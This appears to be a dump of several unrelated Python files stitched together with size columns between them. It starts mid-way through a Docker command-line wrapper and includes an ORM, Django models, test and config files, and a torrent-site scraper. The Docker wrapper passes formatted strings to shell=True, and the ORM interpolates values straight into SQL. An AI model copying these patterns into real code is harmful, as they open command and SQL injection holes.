settings['mapped_ports'][port] = num_pattern.findall(key)[0]
elif container_settings['HostConfig']['PortBindings']:
for key, value in container_settings['HostConfig']['PortBindings'].items():
port = num_pattern.findall(value[0]['HostPort'])[0]
settings['mapped_ports'][port] = num_pattern.findall(key)[0]
if container_settings['Config']['Env']:
for variable in container_settings['Config']['Env']:
k, v = variable.split('=')
settings['container_variables'][k] = v
for volume in container_settings['Mounts']:
system_path = volume['Source']
container_path = volume['Destination']
settings['mounted_volumes'][system_path] = container_path
if container_settings['NetworkSettings']:
if container_settings['NetworkSettings']['Networks']:
for key in container_settings['NetworkSettings']['Networks'].keys():
settings['container_networks'].append(key)
# determine stopped status
if settings['container_status'] == 'exited':
if not container_status:
try:
from subprocess import check_output, STDOUT
sys_command = 'docker logs --tail 1 %s' % settings['container_alias']
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
settings['container_status'] = 'stopped'
except:
pass
else:
settings['container_status'] = container_status
return settings
def images(self):
'''
a method to list the local docker images
:return: list of dictionaries with available image fields
[ {
'CREATED': '7 days ago',
'TAG': 'latest',
'IMAGE ID': '2298fbaac143',
'VIRTUAL SIZE': '302.7 MB',
'REPOSITORY': 'test1'
} ]
'''
sys_command = 'docker images'
sys_output = self.command(sys_command)
image_list = self._images(sys_output)
return image_list
def ps(self):
'''
a method to list the local active docker containers
:return: list of dictionaries with active container fields
[{
'CREATED': '6 minutes ago',
'NAMES': 'flask',
'PORTS': '0.0.0.0:5000->5000/tcp',
'CONTAINER ID': '38eb0bbeb2e5',
'STATUS': 'Up 6 minutes',
'COMMAND': '"gunicorn --chdir ser"',
'IMAGE': 'rc42/flaskserver'
}]
'''
sys_command = 'docker ps -a'
sys_output = self.command(sys_command)
container_list = self._ps(sys_output)
return container_list
def network_ls(self):
'''
a method to list the available networks
:return: list of dictionaries with docker network fields
[{
'NETWORK ID': '3007476acfe5',
'NAME': 'bridge',
'DRIVER': 'bridge',
'SCOPE': 'local'
}]
'''
import re
gap_pattern = re.compile('\t|\s{2,}')
network_list = []
sys_command = 'docker network ls'
output_lines = self.command(sys_command).split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
network_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
network_details[column_headers[j]] = ''
if j <= len(columns) - 1:
network_details[column_headers[j]] = columns[j]
network_list.append(network_details)
return network_list
def inspect_container(self, container_alias):
'''
a method to retrieve the settings of a container
:param container_alias: string with name or id of container
:return: dictionary of settings of container
{ TOO MANY TO LIST }
'''
title = '%s.inspect_container' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send inspect command
import json
sys_command = 'docker inspect %s' % container_alias
output_dict = json.loads(self.command(sys_command))
container_settings = output_dict[0]
return container_settings
def inspect_image(self, image_name, image_tag=''):
'''
a method to retrieve the settings of an image
:param image_name: string with name or id of image
:param image_tag: [optional] string with tag associated with image
:return: dictionary of settings of image
{ TOO MANY TO LIST }
'''
title = '%s.inspect_image' % self.__class__.__name__
# validate inputs
input_fields = {
'image_name': image_name,
'image_tag': image_tag
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# determine system command argument
sys_arg = image_name
if image_tag:
sys_arg += ':%s' % image_tag
# run inspect command
import json
sys_command = 'docker inspect %s' % sys_arg
output_dict = json.loads(self.command(sys_command))
image_settings = output_dict[0]
return image_settings
def rm(self, container_alias):
'''
a method to remove an active container
:param container_alias: string with name or id of container
:return: string with container id
'''
title = '%s.rm' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# run remove command
sys_cmd = 'docker rm -f %s' % container_alias
output_lines = self.command(sys_cmd).split('\n')
return output_lines[0]
def rmi(self, image_id):
'''
a method to remove an image
:param image_name: string with id of image
:return: list of strings with image layers removed
'''
title = '%s.rmi' % self.__class__.__name__
# validate inputs
input_fields = {
'image_id': image_id
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send remove command
sys_cmd = 'docker rmi %s' % image_id
output_lines = self.command(sys_cmd).split('\n')
return output_lines
def ip(self):
'''
a method to retrieve the ip of system running docker
:return: string with ip address of system
'''
if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10:
sys_cmd = 'docker-machine ip %s' % self.vbox
system_ip = self.command(sys_cmd).replace('\n','')
else:
system_ip = self.localhost.ip
return system_ip
def search(self, image_name):
# run docker search
sys_command = 'docker search %s' % image_name
shell_output = self._handle_command(sys_command)
# parse table
from labpack.parsing.shell import convert_table
image_list = convert_table(shell_output)
return image_list
def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'):
# construct sys command arguments
from os import path
tag_insert = ''
if image_tag:
tag_insert = ':%s' % image_tag
path_root, path_node = path.split(dockerfile_path)
sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root)
# determine verbosity
print_pipe = False
if self.verbose:
print_pipe = True
else:
sys_command += ' -q'
# run command
shell_output = self._handle_command(sys_command, print_pipe=print_pipe)
return shell_output
def save(self, image_name, file_name, image_tag=''):
sys_command = 'docker save -o %s %s' % (file_name, image_name)
if image_tag:
sys_command += ':%s' % image_tag
return self.command(sys_command)
def command(self, sys_command):
'''
a method to run a system command in a separate shell
:param sys_command: string with docker command
:return: string output from docker
'''
title = '%s.command' % self.__class__.__name__
# validate inputs
input_fields = {
'sys_command': sys_command
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
from subprocess import check_output, STDOUT, CalledProcessError
try:
output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
except CalledProcessError as err:
raise Exception(err.output.decode('ascii', 'ignore'))
return output
def synopsis(self, container_alias):
'''
a method to summarize key configuration settings required for docker compose
:param container_alias: string with name or id of container
:return: dictionary with values required for module configurations
'''
title = '%s.synopsis' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# retrieve container settings
container_settings = self.inspect_container(container_alias)
# summarize settings
settings = self._synopsis(container_settings)
return settings
def enter(self, container_alias):
'''
a method to open up a terminal inside a running container
:param container_alias: string with name or id of container
:return: None
'''
title = '%s.enter' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# compose system command
from os import system
sys_cmd = 'docker exec -it %s sh' % container_alias
if self.localhost.os.sysname in ('Windows'):
sys_cmd = 'winpty %s' % sys_cmd
# open up terminal
system(sys_cmd)
def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''):
'''
a method to start a local container
:param image_name: string with name or id of image
:param container_alias: string with name to assign to container
:param image_tag: [optional] string with tag assigned to image
:param environmental_variables: [optional] dictionary of envvar fields to add to container
:param mapped_ports: [optional] dictionary of port fields to map to container
:param mounted_volumes: [optional] dictionary of path fields to map to container
:param start_command: [optional] string of command (and any arguments) to run inside container
:param network_name: [optional] string with name of docker network to link container to
:param run_flags: [optional] string with additional docker options to add to container
:return: string with container id
NOTE: valid characters for environmental variables key names follow the shell
standard of upper and lower alphanumerics or underscore and cannot start
with a numerical value.
NOTE: ports are mapped such that the key name is the system port and the
value is the port inside the container. both must be strings of digits.
NOTE: volumes are mapped such that the key name is the absolute or relative
system path and the value is the absolute path inside the container.
both must be strings.
NOTE: additional docker options:
--entrypoint overrides existing entrypoint command
--rm removes container once start command exits
--log-driver sets system logging settings for the container
https://docs.docker.com/engine/reference/run
'''
title = '%s.run' % self.__class__.__name__
# validate inputs
input_fields = {
'image_name': image_name,
'container_alias': container_alias,
'image_tag': image_tag,
'environmental_variables': environmental_variables,
'mapped_ports': mapped_ports,
'mounted_volumes': mounted_volumes,
'start_command': start_command,
'network_name': network_name,
'run_flags': run_flags
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# validate subfields
if environmental_variables:
for key, value in environmental_variables.items():
key_title = '%s(environmental_variables={%s:...})' % (title, key)
self.fields.validate(key, '.envvar_key', key_title)
value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.envvar_value', value_title)
else:
environmental_variables = {}
if mapped_ports:
for key, value in mapped_ports.items():
key_title = '%s(mapped_ports={%s:...})' % (title, key)
self.fields.validate(key, '.port_key', key_title)
value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.port_value', value_title)
else:
mapped_ports = {}
if mounted_volumes:
for key, value in mounted_volumes.items():
key_title = '%s(mounted_volumes={%s:...})' % (title, key)
self.fields.validate(key, '.mount_field', key_title)
value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.mount_field', value_title)
else:
mounted_volumes = {}
# TODO verify image exists (locally or remotely) ???
# verify alias does not exist
for container in self.ps():
if container['NAMES'] == container_alias:
raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias))
# verify network exists
network_exists = False
for network in self.network_ls():
if network['NAME'] == network_name:
network_exists = True
if network_name and not network_exists:
raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name))
# verify system paths and compose absolute path mount map
absolute_mounts = {}
from os import path
for key, value in mounted_volumes.items():
if not path.exists(key):
raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' % (title, key))
absolute_path = path.abspath(key)
if self.localhost.os.sysname == 'Windows':
absolute_path = '"/%s"' % absolute_path
else:
absolute_path = '"%s"' % absolute_path
absolute_mounts[absolute_path] = '"%s"' % value
# compose run command
sys_cmd = 'docker run --name %s' % container_alias
for key, value in environmental_variables.items():
sys_cmd += ' -e %s=%s' % (key.upper(), value)
for key, value in mapped_ports.items():
sys_cmd += ' -p %s:%s' % (key, value)
for key, value in absolute_mounts.items():
sys_cmd += ' -v %s:%s' % (key, value)
if network_name:
sys_cmd += ' --network %s' % network_name
if run_flags:
sys_cmd += ' %s' % run_flags.strip()
sys_cmd += ' -d %s' % image_name
if image_tag:
sys_cmd += ':%s' % image_tag
if start_command:
sys_cmd += ' %s' % start_command.strip()
# run run command
output_lines = self.command(sys_cmd).split('\n')
return output_lines[0]
if __name__ == '__main__':
# test docker client init
from pprint import pprint
docker_client = dockerClient()
# test docker list methods
images = docker_client.images()
print(images)
containers = docker_client.ps()
print(containers)
networks = docker_client.network_ls()
print(networks)
remote_images = docker_client.search('alpine')
print(remote_images)
# # test docker run
# from labpack.records.settings import load_settings
# docker_config = load_settings('../../data/test_docker.yaml')
# container_id = docker_client.run(
# image_name=docker_config['image_name'],
# container_alias=docker_config['container_alias'],
# environmental_variables=docker_config['envvar'],
# mounted_volumes=docker_config['mounts'],
# mapped_ports=docker_config['ports'],
# start_command=docker_config['command']
# )
# print(container_id)
#
# # wait for container to start
# from time import sleep
# sleep(1)
# test docker synopsis
for container in containers:
settings = docker_client.synopsis(container['CONTAINER ID'])
pprint(settings)
# test enter and rm from separate script
print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
| 29,112 | 8,414 |
import numpy as np
import pandas as pd
def load_data(dataset='training', path='../data_processed/'):
return pd.read_pickle(path + dataset + '_set.pkl')
def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'):
df = load_data(dataset=dataset, path=path)
labels, files, column_values = [],[],[]
for index, row in df.iterrows():
for f in range(row['mfccs'].shape[1]):
labels.append(row['Label'])
files.append(index)
column_values.append(row['mfccs'][:,f])
df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values })
#Here we make the lists inside the target column into independent columns, while keeping the file_id and label
features_df = pd.concat([df['column_values'].apply(pd.Series), df['File_id'], df['Label']], axis = 1)
features_df = features_df.set_index('File_id')
return features_df
| 947 | 305 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'mnowotka'
import sys
try:
from setuptools import setup
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup
if sys.version_info < (2, 7, 3) or sys.version_info >= (2, 7, 7):
raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7')
setup(
name='chembl-assay-network',
version='0.8.1',
author='Michal Nowotka',
author_email='mnowotka@ebi.ac.uk',
description='Python package generating compound co-occurance matrix for all assays from given document',
url='https://www.ebi.ac.uk/chembldb/index.php/ws',
license='CC BY-SA 3.0',
packages=['chembl_assay_network'],
long_description=open('README.rst').read(),
install_requires=[
'chembl-core-model>=0.8.3',
'numpy>=1.7.1',
'scipy',
],
include_package_data=True,
classifiers=['Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Chemistry'],
zip_safe=False,
) | 1,395 | 454 |
#!/usr/bin/env python3
# ISC License
#
# Copyright (c) 2019, Andrea Giammarchi, @WebReflection
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import random
import os
import sys
sys.path.insert(1, os.path.realpath('./node_modules/filebus/python'))
# initialize the display
from waveshare_epd import epd2in13
epaper = epd2in13.EPD()
# they defined width and height upside down ^_^;;
width=epaper.height
height=epaper.width
# initialize the "canvas"
from PIL import Image, ImageFont, ImageDraw
# initialize the font
from font_fredoka_one import FredokaOne
font = ImageFont.truetype(FredokaOne, 42)
# initiate the FileBus channel
from filebus import FileBus
def ready(value = None):
print('ready')
epaper.init(epaper.lut_full_update)
epaper.Clear(0xFF)
epaper.init(epaper.lut_partial_update)
fb.send('ready', random.random())
def update(message = ''):
print('update: ' + message);
w, h = font.getsize(message)
x = (width - w) / 2
y = (height - h) / 2
img = Image.new("P", (width, height), 255)
draw = ImageDraw.Draw(img)
draw.text((x, y), message, font = font, fill = 0)
epaper.display(epaper.getbuffer(img.rotate(180)))
fb.send('update', random.random())
# use .js as channel input, and .python as channel output
fb = FileBus('.js', '.python')
fb.on('ready', ready)
fb.on('update', update)
# just wait for JS handshake
| 2,029 | 748 |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import os
import unittest
from graph_notebook.configuration.generate_config import AuthModeEnum, Configuration
from graph_notebook.configuration.get_config import get_config
class TestGenerateConfigurationMain(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.generic_host = 'blah'
cls.neptune_host = 'instance.cluster.us-west-2.neptune.amazonaws.com'
cls.port = 8182
cls.test_file_path = f'{os.path.abspath(os.path.curdir)}/test_generate_from_main.json'
cls.python_cmd = os.environ.get('PYTHON_CMD', 'python3') # environment variable to let ToD hosts specify
# where the python command is that is being used for testing.
def tearDown(self) -> None:
if os.path.exists(self.test_file_path):
os.remove(self.test_file_path)
def test_generate_configuration_main_defaults_neptune(self):
expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.DEFAULT,
load_from_s3_arn='', ssl=True)
self.generate_config_from_main_and_test(expected_config, host_type='neptune')
def test_generate_configuration_main_defaults_generic(self):
expected_config = Configuration(self.generic_host, self.port, ssl=True)
self.generate_config_from_main_and_test(expected_config)
def test_generate_configuration_main_override_defaults_neptune(self):
expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.IAM,
load_from_s3_arn='loader_arn', ssl=False)
self.generate_config_from_main_and_test(expected_config, host_type='neptune')
def test_generate_configuration_main_override_defaults_generic(self):
expected_config = Configuration(self.generic_host, self.port, ssl=False)
self.generate_config_from_main_and_test(expected_config)
def test_generate_configuration_main_empty_args_neptune(self):
expected_config = Configuration(self.neptune_host, self.port)
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{expected_config.host}" --port "{expected_config.port}" --auth_mode "" --ssl "" '
f'--load_from_s3_arn "" --config_destination="{self.test_file_path}" ')
self.assertEqual(0, result)
config = get_config(self.test_file_path)
self.assertEqual(expected_config.to_dict(), config.to_dict())
def test_generate_configuration_main_empty_args_generic(self):
expected_config = Configuration(self.generic_host, self.port)
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{expected_config.host}" --port "{expected_config.port}" --ssl "" '
f'--config_destination="{self.test_file_path}" ')
self.assertEqual(0, result)
config = get_config(self.test_file_path)
self.assertEqual(expected_config.to_dict(), config.to_dict())
def generate_config_from_main_and_test(self, source_config: Configuration, host_type=None):
# This will run the main method that our install script runs on a Sagemaker notebook.
# The return code should be 0, but more importantly, we need to assert that the
# Configuration object we get from the resulting file is what we expect.
if host_type == 'neptune':
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{source_config.host}" --port "{source_config.port}" '
f'--auth_mode "{source_config.auth_mode.value}" --ssl "{source_config.ssl}" '
f'--load_from_s3_arn "{source_config.load_from_s3_arn}" '
f'--config_destination="{self.test_file_path}" ')
else:
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{source_config.host}" --port "{source_config.port}" '
f'--ssl "{source_config.ssl}" --config_destination="{self.test_file_path}" ')
self.assertEqual(result, 0)
config = get_config(self.test_file_path)
self.assertEqual(source_config.to_dict(), config.to_dict())
| 4,553 | 1,343 |
# Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import numpy as np
import logging as log
MAX_LINKS = 7
PATH_JSON_PATH = r'data/paths.json'
JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json"
##################################### Crops
CROP_RENDER_WEIGHTING = [6,3,3,0,1,0] # Higher numbers indicate more weight on that joint for rendering
CROP_VARYING = 'SLUB' # Joints to vary for crop calculation
CROP_MAX_PER_JOINT = 50 # Max poses for a single joint
CROP_SEC_ALLOTTED_APPROX = 20 # Approx number of seconds allowed for each crop rendering stage calculation
CROP_PADDING = 10
##################################### Lookups
GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1 # Depending on hardware, this my vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations
LOOKUP_NAME_LENGTH = 5
LOOKUP_MAX_DIV_PER_LINK = 200
LOOKUP_JOINTS = 'SLU' # SL is also usable
LOOKUP_NUM_RENDERED = 6 # 3 or 4 for SL
##################################### Segmentation Models
MODELDATA_FILE_NAME = 'ModelData.json'
NUM_MODELS_TO_KEEP = 3 # If a model has more than this number of stored checkpoints, they will be deleted.
MODEL_NAME_LENGTH = 4
##################################### Wizard Settings
WIZARD_DATASET_PREVIEW = True # Set to false to reduce lag caused by dataset previewing
##################################### Verifier
VERIFIER_ALPHA = .7 # Weight to place on images in verifier
VERIFIER_SELECTED_GAMMA = -50 # Amount to add to R/G/B Channels of a selected image. Usually negative.
VERIFIER_SCALER = 1.5 # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR
VERIFIER_ROWS = 4 # Rows of images present in Verifier
VERIFIER_COLUMNS = 4 # Columns of images present in Verifier
##################################### Datasets
VIDEO_FPS = 15 # Default video frames per second
THUMBNAIL_DS_FACTOR = 6 # Factor to downscale images by for thumbnails. Larger numbers yield smaller images
DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0] # Base camera pose to fill new datasets with before alignment
##################################### Rendering
def default_render_color_maker(num:int):
"""Creates unique colors for rendering.
Parameters
----------
num : int
Number of colors to generate. Should be larger than the number of meshes expected to use.
For 6-axis robots, the minimum recommended number is 7.
Returns
-------
List[List]
num pairs of RGB triplets
"""
if num < 7:
log.warn('Fewer than 7 rendering colors are being generated. This may cause issues if a URDF with a 6+ axis robot is loaded.')
b = np.linspace(0,255,num).astype(int) # Blue values are always unique
g = [0] * b.size
r = np.abs(255 - 2*b)
colors = []
for idx in range(num):
colors.append([b[idx],g[idx],r[idx]])
return colors
DEFAULT_RENDER_COLORS = default_render_color_maker(7) # Increase if expecting to use more meshes/end effector | 3,201 | 1,078 |
from Pybernate.Exceptions import LazyInitializationException
class Entity:
def __init__(self):
self.deleted = False
self.dirty = False
self.initialized = False
def set_dirty(self, state):
self.dirty = state
def get_dirty(self):
return self.dirty
def set_deleted(self, state):
self.deleted = state
def get_deleted(self):
return self.deleted
def set_initialized(self, state):
self.initialized = state
def get_initialized(self):
return self.initialized
def rollback(self):
pass
class IdEntity(Entity):
def __init__(self, **kwargs):
super().__init__()
self.id = None
self.table = self.get_subclass_name().lower()
self.lazies = set()
self.transients = set()
self.elements = {}
self._mixin(kwargs)
self.id_column = "id"
self.column_names = list(kwargs.keys())
self.one_to_many = {}
self.many_to_one = {}
self.override_methods()
def _mixin(self, data):
if isinstance(data, dict):
self.lazies -= data.keys()
self.elements = {**self.elements, **data}
elif isinstance(data, IdEntity):
self.elements[data.table] = data
def set_table(self, table_name):
self.table = table_name
def set_id_column(self, col_name):
self.id_column = col_name
def add_lazy(self, fxn):
self.lazies.add(fxn[4:])
def add_transient(self, fxn):
self.transients.add(fxn)
def addOneToMany(self, other_table, join_column):
self.one_to_many[other_table[4:]] = join_column
def addManyToOne(self, other_table, join_column):
self.many_to_one[other_table[4:]] = join_column
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def init_lazy(self, data):
self.id = data[self.id_column]
del data[self.id_column]
self.elements = data
self.column_names = data.keys()
def get_element_methods(self):
return sorted(list(self.get_subclass_methods() - self.transients)) # deterministic for testing
def override_methods(self):
methods = self.get_element_methods()
for method in methods:
if method.startswith("get_"):
method_target = method[4:]
getattr(self, method)()
if method_target in self.lazies and method_target in self.elements:
self.lazies.remove(method_target)
if self.id_column == method_target:
setattr(self, method, lambda: self.get_id())
continue
if method in self.transients:
continue
setattr(self, method, lambda t=method_target: self.get_element(t))
if method_target not in self.elements:
self.set_element(method_target, None)
elif method.startswith("set_"):
method_target = method[4:]
getattr(self, method)(None)
if method in self.transients:
continue
setattr(self, method, lambda value, x=method_target: self.set_element(x, value))
def get_element(self, x):
if x in self.lazies:
raise LazyInitializationException(x)
return self.elements[x]
def set_element(self, x, value):
self.elements[x] = value
self.set_dirty(True)
def get_insert_query(self):
names_component = ", ".join(["`" + a + "`" for a in self.column_names])
elements_component = ", ".join(["%s "] * len(self.column_names))
return "INSERT INTO {} ({}) VALUES ({})".format(self.table,
names_component,
elements_component)
def get_update_query(self):
updates = ", ".join(["{} = '{}'".format(key, value) for key, value in self.elements.items()])
return "UPDATE {} SET {} WHERE id = {}".format(self.table,
updates,
self.id)
def get_initialize_query(self, attribute):
return "SELECT {} FROM {} WHERE {} = {}".format(attribute, self.table, self.id_column, self.id)
def get_delete_query(self):
return "DELETE FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)
def get_select_all_query(self):
return "SELECT * FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)
def get_eager_fields(self):
return self.elements.keys() - self.lazies - self.transients - self.one_to_many.keys() - self.many_to_one.keys()
def get_many_to_one_relationships(self):
return self.many_to_one
def get_one_to_many_relationships(self):
return self.one_to_many
def get_select_lazy_query(self):
fields = self.get_eager_fields()
fields.add(self.id_column)
eager_fields = ", ".join(fields)
return "SELECT {} FROM {} WHERE {} = {}".format(eager_fields, self.table, self.id_column, self.id)
def get_raw_elements(self):
return [self.elements[k] for k in self.column_names]
def get_subclass_name(self):
return self.__class__.__name__
def get_subclass_methods(self):
return {func for func in dir(self.__class__) if callable(getattr(self.__class__, func))} \
- {func for func in dir(IdEntity) if callable(getattr(IdEntity, func))} | 5,619 | 1,682 |
from .group import Group
from .aminoacid import AminoAcid
from .nucleotide import Nucleotide
from .water import Water
from .ion import Ion
from .cosolute import Cosolute
from .small_molecule import SmallMolecule
| 213 | 73 |
# The number of points to use in smooth curve fits.
n_pts_smooth = 2000
default_fourier_n_harm = 10 | 101 | 41 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-19 12:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reads', '0007_auto_20171115_2224'),
]
operations = [
migrations.AlterField(
model_name='book',
name='link',
field=models.CharField(max_length=2000),
),
]
| 447 | 169 |
from django.db import models
from django.db.models.fields import related
class MarketingCampaign(models.Model):
"""Store the information of marketing campaign."""
title = models.CharField(max_length=50)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self) -> str:
return f'<Marketing Campaign: {self.title}>'
class Voucher(models.Model):
"""Store the information of the voucher."""
campaign = models.ForeignKey(MarketingCampaign, on_delete=models.CASCADE, related_name="campaign")
code = models.CharField(max_length=15)
active = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self) -> str:
active = "Yes" if self.active else "No"
return f"<Voucher: {self.code} ({active})>" | 930 | 296 |
__author__ = 'armanini'
import httplib, requests, re
from urlparse import urlparse
class KickAssFetcher(object):
def __init__(self):
self.search_url = "http://kickass.to/usearch/"
self.title_re = re.compile(r'(?P<imdb_id>tt\d{7})', flags=re.IGNORECASE + re.MULTILINE)
def search(self, torrent_hash):
url = self.search_url + torrent_hash
print "Start search for: ", url
r = requests.get(url)
if len(r.history) < 0 or r.history[-1].status_code != 302:
print "No History ", r.history
return None
res = self.title_re.findall(r.text)
print res
if res:
print "Found: ", res[-1]
return res[-1]
else:
print "Imdb Not found!"
return None
def get_status_code(self, url):
url_part = urlparse(url)
try:
conn = httplib.HTTPConnection(url_part.netloc)
conn.request("HEAD", url_part.path)
return conn.getresponse().status
except:
return None
def main():
kParse = KickAssFetcher()
kParse.search("252DDC4D3EF6E7EE393CD842239ACEB86BF7A546")
if __name__ == "__main__":
main() | 1,216 | 416 |
"""Constants for localtuya integration."""
ATTR_CURRENT = "current"
ATTR_CURRENT_CONSUMPTION = "current_consumption"
ATTR_VOLTAGE = "voltage"
CONF_LOCAL_KEY = "local_key"
CONF_PROTOCOL_VERSION = "protocol_version"
CONF_DPS_STRINGS = "dps_strings"
CONF_PRODUCT_KEY = "product_key"
# light
CONF_BRIGHTNESS_LOWER = "brightness_lower"
CONF_BRIGHTNESS_UPPER = "brightness_upper"
CONF_COLOR = "color"
CONF_COLOR_MODE = "color_mode"
CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin"
CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin"
CONF_COLOR_TEMP_REVERSE = "color_temp_reverse"
CONF_MUSIC_MODE = "music_mode"
# switch
CONF_CURRENT = "current"
CONF_CURRENT_CONSUMPTION = "current_consumption"
CONF_VOLTAGE = "voltage"
# cover
CONF_COMMANDS_SET = "commands_set"
CONF_POSITIONING_MODE = "positioning_mode"
CONF_CURRENT_POSITION_DP = "current_position_dp"
CONF_SET_POSITION_DP = "set_position_dp"
CONF_POSITION_INVERTED = "position_inverted"
CONF_SPAN_TIME = "span_time"
# fan
CONF_FAN_SPEED_CONTROL = "fan_speed_control"
CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control"
CONF_FAN_SPEED_MIN = "fan_speed_min"
CONF_FAN_SPEED_MAX = "fan_speed_max"
CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list"
CONF_FAN_DIRECTION = "fan_direction"
CONF_FAN_DIRECTION_FWD = "fan_direction_forward"
CONF_FAN_DIRECTION_REV = "fan_direction_reverse"
# sensor
CONF_SCALING = "scaling"
# climate
CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp"
CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp"
CONF_TEMPERATURE_STEP = "temperature_step"
CONF_MAX_TEMP_DP = "max_temperature_dp"
CONF_MIN_TEMP_DP = "min_temperature_dp"
CONF_PRECISION = "precision"
CONF_TARGET_PRECISION = "target_precision"
CONF_HVAC_MODE_DP = "hvac_mode_dp"
CONF_HVAC_MODE_SET = "hvac_mode_set"
CONF_PRESET_DP = "preset_dp"
CONF_PRESET_SET = "preset_set"
CONF_HEURISTIC_ACTION = "heuristic_action"
CONF_HVAC_ACTION_DP = "hvac_action_dp"
CONF_HVAC_ACTION_SET = "hvac_action_set"
CONF_ECO_DP = "eco_dp"
CONF_ECO_VALUE = "eco_value"
# vacuum
CONF_POWERGO_DP = "powergo_dp"
CONF_IDLE_STATUS_VALUE = "idle_status_value"
CONF_RETURNING_STATUS_VALUE = "returning_status_value"
